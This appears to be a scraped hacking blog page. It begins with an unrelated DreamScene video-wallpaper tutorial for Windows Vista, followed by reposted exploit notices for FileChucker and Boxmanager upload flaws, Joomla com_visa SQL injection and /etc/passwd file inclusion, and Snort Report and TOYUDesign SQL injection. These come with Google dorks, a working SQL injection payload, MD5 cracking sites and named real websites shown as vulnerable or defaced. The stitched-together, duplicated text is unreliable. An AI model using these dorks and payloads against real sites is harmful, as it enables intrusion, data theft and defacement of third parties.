Are you bored of those static images on your Desktop Background? Do you feel the need to use a Video in its Place? Ok then, I will tell you how you can do it! Just do as I say and you will have a cool video playing as your Desktop wallpaper.
Let me tell you(most of you will already know) that Windows Vista Ultimate has a feature known as DreamScene which allows you to set a Video as a BackGround. But this feature is not present in any other versions of Windows Vista. As most of the people have already shifted to Vista from their old OS, I will give a detailed tutorial on how you can get started with DreamScene.
Download the DreamScene pack for Vista:
http://techfreakstuff.com/wp-content/uploads/2009/10/DreamScene_EN.rar
It is a RAR file. Extract the RAR file in any folder and then follow the steps:
Run “Install.bat” file with Administrator rights (i.e. Right Click on it and Click on: Run as administrator)
Follow the steps in the command prompt
Reboot, or Run “Reload.bat” file with normal (non-Admin) rights (i.e. just Double Click on it)
After you follow these steps Right Click on your Desktop. When the list opens up, you will find an option called “Play DreamScene”.
This shows that you have installed this Vista Add-On properly.
Just remember that you can only play .WMV or .MPG files as your video Backgrounds. Now Right Click on the Video file you want to play as your Background. Select “Set as Desktop Background”. Once you do it, you cam see the same Video playing in your Desktop as the Wallpaper.
If you want to Pause this video in the Background, just Right click on the Desktopand select “Pause DreamScene”. You are done now!
Many people who still use XP miss this feature! You can use the XPScene software(http://www.dreamscene.org/download.php) for Windows XP to use this feature.
PhantomCrews
Followers PHC
Popular Posts
Thursday, February 16, 2012
FileChucker-Uploader v4.x File Upload Vulnerability
# Title : FileChucker-Uploader v4.x File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : http://www.1337day.com * http://www.exploit-id.com * sec4ever.com * r00tw0rm.com
# platform : php
# Impact : File Upload (.html)
# Tested on : Windows XP SP3 (fr)
#
# G0ogle d0rk : allintext:"File Upload by Encodable"
# p0c :
-> http://[site]/[path]/{uploader} *.cgi *.*
=> Upload file her3
--> and find hime in userfile ....
hasil: http://www.finelinensw.com.au/transfer/upload/files/users/8436c0707e640ef23a223d272dcc39e4/dee-cisadane.html
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : http://www.1337day.com * http://www.exploit-id.com * sec4ever.com * r00tw0rm.com
# platform : php
# Impact : File Upload (.html)
# Tested on : Windows XP SP3 (fr)
#
# G0ogle d0rk : allintext:"File Upload by Encodable"
# p0c :
-> http://[site]/[path]/{uploader} *.cgi *.*
=> Upload file her3
--> and find hime in userfile ....
hasil: http://www.finelinensw.com.au/transfer/upload/files/users/8436c0707e640ef23a223d272dcc39e4/dee-cisadane.html
Boxmanager upload vuln(Shell)
Google Dorks:inurl:"default_image.asp"
inurl:"default_imagen.asp"
inurl:"/box_image.htm"
contoh:-
http://www.bid1.co.kr/cgi/upload_img/defacer.html2
http://www.neximage.co.kr/cgi/upload_img/defacer.html
Credit:PhantomCrews.
inurl:"default_imagen.asp"
inurl:"/box_image.htm"
contoh:-
http://www.bid1.co.kr/cgi/upload_img/defacer.html2
http://www.neximage.co.kr/cgi/upload_img/defacer.html
Credit:PhantomCrews.
MD5 Decrypter
http://www.md5decrypter.co.uk/
http://www.md5this.com/crack-it-/index.php
http://md5.web-max.ca/
http://md5encryption.com/
http://www.md5decrypter.com/
http://md5crack.com/crackmd5.php
http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
http://md5-decrypter.com/
http://www.md5decrypter.com/
http://www.xmd5.org/
http://www.shell-storm.org/md5/
http://www.md5encrypter.com/
http://www.cmd5.org/
http://www.md5this.com/crack-it-/index.php
http://md5.web-max.ca/
http://md5encryption.com/
http://www.md5decrypter.com/
http://md5crack.com/crackmd5.php
http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
http://md5-decrypter.com/
http://www.md5decrypter.com/
http://www.xmd5.org/
http://www.shell-storm.org/md5/
http://www.md5encrypter.com/
http://www.cmd5.org/
Friday, February 3, 2012
Joomla Visa SQL Injection / Local File Inclusion
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Official Website: http:///ww.1337day.com 0
1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1
0 0
1 ########################################## 1
0 I'm NuxbieCyber Member From Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[ Joomla Component com_visa Multiple Vulnerability ]
[x] Author : the_cyber_nuxbie
[x] Home : www.thecybernuxbie.com
[x] E-mail : staff@thecybernuxbie.com
[x] Found : 28 January 2012 @ 04:53 PM.
[x] Tested : Back|Track 5.
[x] Dork : inurl:"/index.php?option=com_visa"
________________________________________________________________
****************************************************************
- Exploit Report:
http://localhost/index.php?option=com_visa&view=book&id=[SQL Injection]
http://localhost/index.php?option=com_visa&Itemid=xxx&page=[SQL Injection]
http://localhost/index.php?option=com_visa&controller=[LFI]
- Website Vuln SQLi + LFI:
http://www.welcomeindochina.com/index.php?option=com_visa&view=book&id=23' + [SQL Injection]
http://www.unitema.ru/index.php?option=com_visa&Itemid=35&page=4' + [SQL Injection]
http://www.legendlandsdiscovery.com/index.php?option=com_visa&controller=../../../../../../../../../../../../../etc/passwd
0day no more...
"n0 d0rk f0r k1dd10ts"
- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...
- Greetz To All Exploiters From Indonesian:
[ Member Of Inj3ct0r & Exploit-DB ]
Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,
eidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,
k4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, Netrondoank,
NoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,
team_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc...
"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground"
Me @ January, 28 2012, GMT +04:53 Solo Raya, Indonesian.
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Official Website: http:///ww.1337day.com 0
1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1
0 0
1 ########################################## 1
0 I'm NuxbieCyber Member From Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[ Joomla Component com_visa Multiple Vulnerability ]
[x] Author : the_cyber_nuxbie
[x] Home : www.thecybernuxbie.com
[x] E-mail : staff@thecybernuxbie.com
[x] Found : 28 January 2012 @ 04:53 PM.
[x] Tested : Back|Track 5.
[x] Dork : inurl:"/index.php?option=com_visa"
________________________________________________________________
****************************************************************
- Exploit Report:
http://localhost/index.php?option=com_visa&view=book&id=[SQL Injection]
http://localhost/index.php?option=com_visa&Itemid=xxx&page=[SQL Injection]
http://localhost/index.php?option=com_visa&controller=[LFI]
- Website Vuln SQLi + LFI:
http://www.welcomeindochina.com/index.php?option=com_visa&view=book&id=23' + [SQL Injection]
http://www.unitema.ru/index.php?option=com_visa&Itemid=35&page=4' + [SQL Injection]
http://www.legendlandsdiscovery.com/index.php?option=com_visa&controller=../../../../../../../../../../../../../etc/passwd
0day no more...
"n0 d0rk f0r k1dd10ts"
- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...
- Greetz To All Exploiters From Indonesian:
[ Member Of Inj3ct0r & Exploit-DB ]
Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,
eidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,
k4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, Netrondoank,
NoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,
team_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc...
"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground"
Me @ January, 28 2012, GMT +04:53 Solo Raya, Indonesian.
Snort Report 1.3.2 SQL Injection
# Exploit Title: Snort Report <= 1.3.2 SQL Injection Vulnerability
# Date: 29/01/2012
# Author: a.kadir altan (testpenter_AT_gmail.com)
# Software Link: http://www.symmetrixtech.com/ids/snortreport-1.3.2.tar.gz
# Version: <= 1.3.2
# Platform: PHP
##########################
Vulnerable parameter:
ipAddress
Vulnerable URL:
http://server/ipdetail.php?type=dst&FQDN=&ipAddress=773116111&beginTime=0&endTime=1324665310
PoC:
http://server/ipdetail.php?type=dst&FQDN=&ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%280x3a79786a3a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a7578713a%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&beginTime=0&endTime=1324665310
##########################
# Patched in v1.3.3
# Date: 29/01/2012
# Author: a.kadir altan (testpenter_AT_gmail.com)
# Software Link: http://www.symmetrixtech.com/ids/snortreport-1.3.2.tar.gz
# Version: <= 1.3.2
# Platform: PHP
##########################
Vulnerable parameter:
ipAddress
Vulnerable URL:
http://server/ipdetail.php?type=dst&FQDN=&ipAddress=773116111
PoC:
http://server/ipdetail.php?type=dst&FQDN=&ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%280x3a79786a3a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a7578713a%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&beginTime=0&endTime=1324665310
##########################
# Patched in v1.3.3
TOYUDesign SQL Injection
# Exploit Title: TOYUDesign SQL Injection Vulnerability
# Date: 03/02/2012 - 02.49
# Author: 3spi0n
# Software Website: www.toyudesign.com
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:
[~] Changer
[$] Demo Sites:
[~] www.nusamandiriinstruments.com/products.php?id=38" [SQL Injection]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# SpyDevilz.iN - Turkish Hacker Platform
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
Bug Researcher Group - TURKEY
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Date: 03/02/2012 - 02.49
# Author: 3spi0n
# Software Website: www.toyudesign.com
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:
[~] Changer
[$] Demo Sites:
[~] www.nusamandiriinstruments.com/products.php?id=38" [SQL Injection]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# SpyDevilz.iN - Turkish Hacker Platform
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
Bug Researcher Group - TURKEY
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Subscribe to:
Posts (Atom)